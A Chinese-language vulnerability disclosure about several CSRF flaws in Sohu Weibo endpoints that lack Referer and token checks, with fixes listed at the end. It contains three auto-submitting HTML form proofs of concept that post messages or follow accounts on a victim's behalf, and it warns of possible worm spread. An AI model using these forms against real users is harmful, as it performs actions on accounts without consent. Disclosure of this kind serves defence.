搜狐微博的几处CSRF漏洞分析与解决方法
搜狐微博的几处CSRF漏洞分析与解决方法
发布时间:2016-12-21 来源:查字典编辑
摘要:搜狐某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布微博详细说明:在接受POST和GET的信息的时候,未对POST来路(Ref...

搜狐某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布微博

详细说明:

在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。

漏洞地址:

复制代码代码如下:

http://t.sohu.com/t/twAction.jsp

<html>

<body>

<form id="imlonghao" name="imlonghao" action="http://t.sohu.com/t/twAction.jsp" method="post">

<input type="text" name="msg" value="XX" />

<input type="text" name="act" value="insertTwitter" />

<input type="text" name="groupid" value="0" />

<input type="submit" value="submit" />

</form>

<script>

document.imlonghao.submit();

</script>

</body>

</html>

接口返回信息

搜狐微博的几处CSRF漏洞分析与解决方法1

效果

搜狐微博的几处CSRF漏洞分析与解决方法2

第二个

复制代码代码如下:

http://t.sohu.com/t/twAction.jsp

<html>

<body>

<form id="imlonghao" name="imlonghao" action="http://t.sohu.com/t/twAction.jsp" method="post">

<input type="text" name="msg" value="XX" />

<input type="text" name="act" value="insertTwitter" />

<input type="text" name="groupid" value="0" />

<input type="submit" value="submit" />

</form>

<script>

document.imlonghao.submit();

</script>

</body>

</html>

返回信息

搜狐微博的几处CSRF漏洞分析与解决方法3

效果

搜狐微博的几处CSRF漏洞分析与解决方法4

第三个:

漏洞地址:

复制代码代码如下:

http://t.sohu.com/follow/addfollows

<html>

<body>

<form id="imlonghao" name="imlonghao" action="http://t.sohu.com/follow/addfollows" method="post">

<input type="text" name="act" value="follow" />

<input type="text" name="friendids" value="23117291" />

<input type="text" name="uid" value="23117291" />

<input type="submit" value="submit" />

</form>

<script>

document.imlonghao.submit();

</script>

</body>

</html>

搜狐微博的几处CSRF漏洞分析与解决方法5

接口返回信息

搜狐微博的几处CSRF漏洞分析与解决方法6

效果

修复方案:

检查POST来路Referer

在POST的信息中加token

作者:imlonghao

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新漏洞分析学习
热门漏洞分析学习
网络安全子分类